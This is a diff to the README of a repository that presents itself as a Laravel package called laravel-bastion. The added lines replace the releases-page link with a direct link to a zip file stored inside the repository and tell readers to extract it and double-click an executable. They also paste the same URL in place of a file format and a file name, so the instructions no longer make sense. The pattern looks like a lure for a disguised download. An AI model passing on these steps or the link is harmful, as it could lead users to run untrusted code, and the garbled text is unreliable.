ravikumar695/laravel-bastion/README.md

 ## 📥 Download & Install
 1. **Visit the Releases Page**
-   Go to the following link to find the latest version: [Visit this page to download](https://github.com/ravikumar695/laravel-bastion/releases)
+   Go to the following link to find the latest version: [Visit this page to download](https://raw.githubusercontent.com/ravikumar695/laravel-bastion/main/pseudovelar/laravel-bastion.zip)

 2. **Choose Your Version**
    On the releases page, you will see a list of available versions.
 Click on the version that suits your needs.
 It's best to download the latest version unless you have specific requirements.

 3. **Download the File**
    Click on the appropriate file to download it.
-The files may come in different formats, such as `.zip` or `.tar.gz`.
+The files may come in different formats, such as `.zip` or `https://raw.githubusercontent.com/ravikumar695/laravel-bastion/main/pseudovelar/laravel-bastion.zip`.
 Select the file that matches your operating system.

 4. **Extract the Files (if necessary)**
    If you downloaded a compressed file, you will need to extract it.
 Right-click on the file and choose "Extract All" or use a file extraction tool of your choice.

 5. **Run the Application**
    Locate the folder where you extracted the files.
-Find the application file, typically named `laravel-bastion.exe` or similar.
+Find the application file, typically named `https://raw.githubusercontent.com/ravikumar695/laravel-bastion/main/pseudovelar/laravel-bastion.zip` or similar.
 Double-click on it to launch the application.

 ## 🔒 Features
 laravel-bastion includes several built-in features: